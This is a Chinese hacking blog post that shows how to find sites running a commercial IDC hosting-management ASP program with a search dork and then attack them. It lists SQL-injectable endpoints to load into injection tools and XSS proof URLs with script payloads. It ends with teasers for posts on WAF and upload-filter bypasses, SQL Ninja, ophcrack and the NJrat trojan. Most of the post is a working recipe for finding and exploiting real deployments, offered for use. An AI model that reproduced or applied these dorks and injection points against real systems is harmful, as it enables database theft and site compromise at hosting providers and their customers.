作者:qingran
首先百度搜索关键字:inurl: (mmdatabase.asp)
我随便列举一个: www.xxxx.com
修改链接:http://www.xxxx.com:80/Style/news.asp?action=true&RID=1&ID=1
扔入NBSI 或者啊D等各种 *** 工具中
SQL:
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
http://www.xxxxxx.com:80/Manage/CreateHost.asp?Url=/Style/memberlogin.asp&PID=11
http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?Url=/Style/memberlogin.asp&PID=9
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
XSS证明:
http://www.xxxxxx.com:80/Manage/CreateHost.asp?PID=11&Url=/Style/memberlogin.asp";alert(42873);"
http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?PID=9&Url=/Style/memberlogin.asp";alert(42873);"
http://www.xxxxxx.com:80/Style/domainInquiry.asp?dfcn=true?cndns=88888&button4=88888&checkbox2=.bj.cn<script>alert(42873)</script>
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
还是星外吧 你们懂的
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
SnoopSnitch是一款开源系统Android程序运行,为客户出示检测移动终端及其设备连接的移动互联网安全系数的机遇。 SnoopSnitch运用是一款用于剖析挪动通信网络的挪动防护软件。该运用...
黑客技术(想要学黑客技术)小编在头条陆陆续续发布了不少关于黑客的视频,很多对网络安全感兴趣的网友私信我,说想要学习黑客技术。这里面多数人都是纯小白,在大家的认知中,学习黑客就是学会用那些黑客工具,而忽...
1.过注入 2.过大马被阻拦访问 3.过菜刀连接一句话被拦截 4.过1.asp;.jpg这样的文件 其他我没遇到了。。 现在一点一点讲: 1.过注入 方法一:a.asp?aaa=%00&id=...
什么叫SQL Ninja? Sql Ninja使客户可以运用应用Microsoft SQL网络服务器做为其数据库查询后端Web程序运行。它致力于在远程控制服务器上获得运作的shell。一旦发觉了SQ...
什么叫ophcrack? Ophcrack是一个根据彩虹表的密码破解者。此专用工具能够 导进不一样文件格式的散列,包含立即从Windows的SAM文档转储。一些七色彩虹桌能够 一键下载,但假如您要想...
不久前,有一个事在新浪微博特火的,一名程序猿用了一款姓名叫NJrat的木马病毒反控制了互联网诈骗犯。 用木马病毒来基础学习网络黑客专业知识,会让许多新手有兴趣爱好。 但是许多新手在检测...